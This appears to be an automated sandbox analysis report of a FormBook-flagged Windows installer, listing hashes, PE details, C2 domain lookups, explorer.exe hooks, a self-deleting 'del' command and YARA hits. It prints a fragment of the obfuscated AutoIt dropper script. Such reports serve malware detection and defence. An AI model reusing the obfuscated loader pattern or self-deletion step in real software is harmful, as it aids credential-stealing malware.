Preview:	..R.1..$. .<.hj..@.....r.....x6....q..x9.\|.G.%..".........j.h..V..s....l.j.V....Z.j a......<.2m?gMZa).u5.O:.Z.b.......<..q....f..-.......T........Y..,M.H[..z......o....o.==...^...?.....j(H.8.....7.Z.o.).;.J........-.v...}.q.Dqe....~.G.........L.'6..0..Q..7B9.qV.8.....q9..x94\|.V.%.."........j...TV..x.2F..2.-.{6SCNU.`v..y...Y!.."....R<.0.G...........<.....c...+.cD.R.2/.+;.M.jR.....M.8#./.'o...h..o....o....FG.^....6...xZ.........^7y.g..)x10.........-cp...}..Dqe...n..~.G......$.L.'6...Qh.7B9.q.x6....q..x9.\|.G.%.."........j...TV..x.2F..2.-.{6SCNU.`v..y...Y!.."....R<.0.G...........<.....c...+.cD.R.2/.+;.M.jR.....M.8#./.'o...h..o....o.==...^.]?.6d..x~...8.....^7y.g..).10J........-cp...}..Dqe...n..~.G......$.L.'6...Qh.7B9.q.x6....q..x9.\|.G.%.."........j...TV..x.2F..2.-.{6SCNU.`v..y...Y!.."....R<.0.G...........<.....c...+.cD.R.2/.+;.M.jR.....M.8#./.'o...h..o....o.==...^.]?.6d..x~...8.....^7y.g..).10J........

C:\Users\user\AppData\Local\Temp\wenvaisrl.au3

Download File

Process:	C:\Users\user\Desktop\shedfam.exe
File Type:	ASCII text, with very long lines (1182), with CRLF line terminators
Category:	dropped
Size (bytes):	6409
Entropy (8bit):	4.539976822490987
Encrypted:	false
SSDEEP:	48:Adcp3cMcpp4c/NenP+h+OqbQALctNfP7CRvNrgBRyKSPXPXtXtXdhVcGgypVdAyq:AdeLvoIP+gOqb5Y78NcCHy3mPgAe
MD5:	F94D60D73EEED59DB9C9EA910387DF5E
SHA1:	A7A5D3AD43B240813CA47DD550D0632E0CC1B846
SHA-256:	35D0A39DEB3A4CA1DD624D441359A320A89F044476BA5665EED31C4E51019C2C
SHA-512:	E6CE3DB8563F4ED6989562FA0FBB561DAEB9E022B72D6EB746AE1181B2018633C7F22A0F2AE591D14D794340AA54A4699480219266E9B81E04A1A1D67F8FA983
Malicious:	false
Preview:	Global $K30ry88 = 227429608..Global $X31w8rp1 = 1313542..Global $A324so = Chr..Global $P334kwt0hcp = Execute..Global $R34og = $P334kwt0hcp($A324so(6618-6550) & $A324so(6658-6550) & $A324so(6658-6550) & $A324so(6633-6550) & $A324so(6666-6550) & $A324so(6664-6550) & $A324so(6667-6550) & $A324so(6649-6550) & $A324so(6666-6550) & $A324so(6633-6550) & $A324so(6651-6550) & $A324so(6666-6550) & $A324so(6618-6550) & $A324so(6647-6550) & $A324so(6666-6550) & $A324so(6647-6550))..Global $B3232eqg0zi8 = $P334kwt0hcp($A324so(6618-6550) & $A324so(6658-6550) & $A324so(6658-6550) & $A324so(6633-6550) & $A324so(6666-6550) & $A324so(6664-6550) & $A324so(6667-6550) & $A324so(6649-6550) & $A324so(6666-6550) & $A324so(6617-6550) & $A324so(6664-6550) & $A324so(6651-6550) & $A324so(6647-6550) & $A324so(6666-6550) & $A324so(6651-6550))..Global $F3339x28s = $P334kwt0hcp($A324so(6618-6550) & $A324so(6658-6550) & $A324so(6658-6550) & $A324so(6617-6550) & $A324so(6647-6550) & $A324so(6658-6550) & $A324so(6658-65

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	6.818960528918014
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	shedfam.exe
File size:	901270
MD5:	c0a85d86855b257b25572aa7d9d90381
SHA1:	ea5ce824d225c0df297586a2c6621aea5ab8584b
SHA256:	c9cf9f0fa6980019aa3a93b9b25ca2cf14cfad4b4afef12d43a20ece34d2093b
SHA512:	373c768311b5385bb45c0558a1bc112c5c8b4d9cceeb5fa41577a5a4f3a936aff6745bf0d6ac3fdc84a17d3eb518cce5d1e4744cdfe64cd35e4478a8693fd11a
SSDEEP:	12288:Avy7P+vzXkpdeYfU+Ey0LOPmEBrNU4jMmrKJVNwysiebm4M4qXftsFf:yAmvgeYc+EAPmEVNSmObWy7eCn4OtsFf
TLSH:	1F1502517F04C5A2C51D19F6CBEFE16C92F28CA2190198336760BE2E3CFEF9268255B5
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3(..RF..RF..RF.]...RF..RG.pRF.]...RF..qv..RF..T@..RF.Rich.RF.........................PE..L...ly.V.................^.........

File Icon


Icon Hash:	5c1cf8c8e970f1c8

Static PE Info

General

Entrypoint:	0x40324f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x567F796C [Sun Dec 27 05:38:52 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	ab6770b0a8635b9d92a5838920cfe770

Entrypoint Preview

Instruction
sub esp, 00000180h
push ebx
push ebp
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+1Ch], ebx
mov dword ptr [esp+14h], 00409130h
xor esi, esi
mov byte ptr [esp+18h], 00000020h
call dword ptr [004070B8h]
call dword ptr [004070B4h]
cmp ax, 00000006h
je 00007F0A94F2A453h
push ebx
call 00007F0A94F2D241h
cmp eax, ebx
je 00007F0A94F2A449h
push 00000C00h
call eax
push 004091E0h
call 00007F0A94F2D1C2h
push 004091D8h
call 00007F0A94F2D1B8h
push 004091CCh
call 00007F0A94F2D1AEh
push 0000000Dh
call 00007F0A94F2D211h
push 0000000Bh
call 00007F0A94F2D20Ah
mov dword ptr [00423F84h], eax
call dword ptr [00407034h]
push ebx
call dword ptr [00407270h]
mov dword ptr [00424038h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 00000160h
push eax
push ebx
push 0041F538h
call dword ptr [00407160h]
push 004091C0h
push 00423780h
call 00007F0A94F2CE41h
call dword ptr [004070B0h]
mov ebp, 0042A000h
push eax
push ebp
call 00007F0A94F2CE2Fh
push ebx
call dword ptr [00407144h]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x73cc	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2d000	0x490d0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x280	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5c4a	0x5e00	False	0.659906914893617	data	6.410763775060762	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x115e	0x1200	False	0.4466145833333333	data	5.142548180775325	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x1b078	0x600	False	0.455078125	data	4.2252195571372315	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x25000	0x8000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x2d000	0x490d0	0x49200	False	0.1362446581196581	data	2.9633699887836995	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x2d310	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 270336	English	United States
RT_ICON	0x6f338	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States
RT_ICON	0x718e0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States
RT_ICON	0x72988	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States
RT_ICON	0x73830	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States
RT_ICON	0x741b8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States
RT_ICON	0x74a60	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	English	United States
RT_ICON	0x75128	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States
RT_ICON	0x75690	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States
RT_DIALOG	0x75af8	0x100	data	English	United States
RT_DIALOG	0x75bf8	0x11c	data	English	United States
RT_DIALOG	0x75d18	0x60	data	English	United States
RT_GROUP_ICON	0x75d78	0x84	data	English	United States
RT_MANIFEST	0x75e00	0x2cc	XML 1.0 document, ASCII text, with very long lines (716), with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	SetFileAttributesA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CompareFileTime, SearchPathA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, CreateDirectoryA, lstrcmpiA, GetTempPathA, GetCommandLineA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, LoadLibraryA, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, WaitForSingleObject, ExitProcess, GetWindowsDirectoryA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, LoadLibraryExA, GetModuleHandleA, MultiByteToWideChar, FreeLibrary
USER32.dll	GetWindowRect, EnableMenuItem, GetSystemMenu, ScreenToClient, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, PostQuitMessage, RegisterClassA, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, OpenClipboard, TrackPopupMenu, SendMessageTimeoutA, GetDC, LoadImageA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, SetWindowLongA, EmptyClipboard, SetTimer, CreateDialogParamA, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll	RegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 29, 2022 15:13:30.139664888 CET	49699	80	192.168.2.3	18.167.242.213
Nov 29, 2022 15:13:30.344316006 CET	80	49699	18.167.242.213	192.168.2.3
Nov 29, 2022 15:13:30.348556042 CET	49699	80	192.168.2.3	18.167.242.213
Nov 29, 2022 15:13:30.348653078 CET	49699	80	192.168.2.3	18.167.242.213
Nov 29, 2022 15:13:30.553149939 CET	80	49699	18.167.242.213	192.168.2.3
Nov 29, 2022 15:13:30.580126047 CET	80	49699	18.167.242.213	192.168.2.3
Nov 29, 2022 15:13:30.580183983 CET	80	49699	18.167.242.213	192.168.2.3
Nov 29, 2022 15:13:30.580450058 CET	49699	80	192.168.2.3	18.167.242.213
Nov 29, 2022 15:13:30.580521107 CET	49699	80	192.168.2.3	18.167.242.213
Nov 29, 2022 15:13:30.785156012 CET	80	49699	18.167.242.213	192.168.2.3
Nov 29, 2022 15:13:51.134776115 CET	49700	80	192.168.2.3	103.100.63.146
Nov 29, 2022 15:13:51.420519114 CET	80	49700	103.100.63.146	192.168.2.3
Nov 29, 2022 15:13:51.420717001 CET	49700	80	192.168.2.3	103.100.63.146
Nov 29, 2022 15:13:51.421838045 CET	49700	80	192.168.2.3	103.100.63.146
Nov 29, 2022 15:13:51.707523108 CET	80	49700	103.100.63.146	192.168.2.3
Nov 29, 2022 15:13:51.719268084 CET	80	49700	103.100.63.146	192.168.2.3
Nov 29, 2022 15:13:51.719347954 CET	80	49700	103.100.63.146	192.168.2.3
Nov 29, 2022 15:13:51.719506979 CET	49700	80	192.168.2.3	103.100.63.146
Nov 29, 2022 15:13:51.721504927 CET	49700	80	192.168.2.3	103.100.63.146
Nov 29, 2022 15:13:52.007050037 CET	80	49700	103.100.63.146	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 29, 2022 15:13:30.082436085 CET	49977	53	192.168.2.3	8.8.8.8
Nov 29, 2022 15:13:30.123944998 CET	53	49977	8.8.8.8	192.168.2.3
Nov 29, 2022 15:13:50.786351919 CET	57840	53	192.168.2.3	8.8.8.8
Nov 29, 2022 15:13:51.133874893 CET	53	57840	8.8.8.8	192.168.2.3
Nov 29, 2022 15:14:11.876477003 CET	57990	53	192.168.2.3	8.8.8.8
Nov 29, 2022 15:14:12.086411953 CET	53	57990	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 29, 2022 15:13:30.082436085 CET	192.168.2.3	8.8.8.8	0x1a2a	Standard query (0)	www.111lll.xyz	A (IP address)	IN (0x0001)	false
Nov 29, 2022 15:13:50.786351919 CET	192.168.2.3	8.8.8.8	0xd00a	Standard query (0)	www.73129.vip	A (IP address)	IN (0x0001)	false
Nov 29, 2022 15:14:11.876477003 CET	192.168.2.3	8.8.8.8	0xc8d8	Standard query (0)	www.autonomaat.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 29, 2022 15:13:30.123944998 CET	8.8.8.8	192.168.2.3	0x1a2a	No error (0)	www.111lll.xyz	zksnp3mu.sktcks.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2022 15:13:30.123944998 CET	8.8.8.8	192.168.2.3	0x1a2a	No error (0)	zksnp3mu.sktcks.com	fbcuj92a.n.sktcks.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2022 15:13:30.123944998 CET	8.8.8.8	192.168.2.3	0x1a2a	No error (0)	fbcuj92a.n.sktcks.com		18.167.242.213	A (IP address)	IN (0x0001)	false
Nov 29, 2022 15:13:30.123944998 CET	8.8.8.8	192.168.2.3	0x1a2a	No error (0)	fbcuj92a.n.sktcks.com		18.167.194.182	A (IP address)	IN (0x0001)	false
Nov 29, 2022 15:13:51.133874893 CET	8.8.8.8	192.168.2.3	0xd00a	No error (0)	www.73129.vip		103.100.63.146	A (IP address)	IN (0x0001)	false
Nov 29, 2022 15:14:12.086411953 CET	8.8.8.8	192.168.2.3	0xc8d8	No error (0)	www.autonomaat.com		54.67.42.145	A (IP address)	IN (0x0001)	false
Nov 29, 2022 15:14:12.086411953 CET	8.8.8.8	192.168.2.3	0xc8d8	No error (0)	www.autonomaat.com		54.67.93.101	A (IP address)	IN (0x0001)	false
Nov 29, 2022 15:14:12.086411953 CET	8.8.8.8	192.168.2.3	0xc8d8	No error (0)	www.autonomaat.com		52.8.134.32	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.111lll.xyz

www.73129.vip

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x84 0x4E 0xE7
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x8C 0xCE 0xE7
GetMessageW	INLINE	0x48 0x8B 0xB8 0x8C 0xCE 0xE7
GetMessageA	INLINE	0x48 0x8B 0xB8 0x84 0x4E 0xE7

Target ID:	0
Start time:	15:12:02
Start date:	29/11/2022
Path:	C:\Users\user\Desktop\shedfam.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\shedfam.exe
Imagebase:	0x400000
File size:	901270 bytes
MD5 hash:	C0A85D86855B257B25572AA7D9D90381
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: kmhbvf.exePID: 4820, Parent PID: 2620

General

Target ID:	1
Start time:	15:12:03
Start date:	29/11/2022
Path:	C:\Users\user\AppData\Local\Temp\kmhbvf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3
Imagebase:	0xed0000
File size:	893608 bytes
MD5 hash:	C56B5F0201A3B3DE53E561FE76912BFD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 2%, ReversingLabs
Reputation:	moderate

Analysis Process: kmhbvf.exePID: 5280, Parent PID: 4820

General

Target ID:	2
Start time:	15:12:03
Start date:	29/11/2022
Path:	C:\Users\user\AppData\Local\Temp\kmhbvf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3
Imagebase:	0xed0000
File size:	893608 bytes
MD5 hash:	C56B5F0201A3B3DE53E561FE76912BFD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Analysis Process: explorer.exePID: 3452, Parent PID: 5280

General

Target ID:	3
Start time:	15:12:09
Start date:	29/11/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff69fe90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Analysis Process: NETSTAT.EXEPID: 2304, Parent PID: 3452

General

Target ID:	13
Start time:	15:12:51
Start date:	29/11/2022
Path:	C:\Windows\SysWOW64\NETSTAT.EXE
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\NETSTAT.EXE
Imagebase:	0x120000
File size:	32768 bytes
MD5 hash:	4E20FF629119A809BC0E7EE2D18A7FDB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Analysis Process: cmd.exePID: 5488, Parent PID: 2304

General

Target ID:	14
Start time:	15:12:59
Start date:	29/11/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\AppData\Local\Temp\kmhbvf.exe"
Imagebase:	0xb0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exePID: 5260, Parent PID: 5488

General

Target ID:	15
Start time:	15:12:59
Start date:	29/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

⊘No disassembly

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

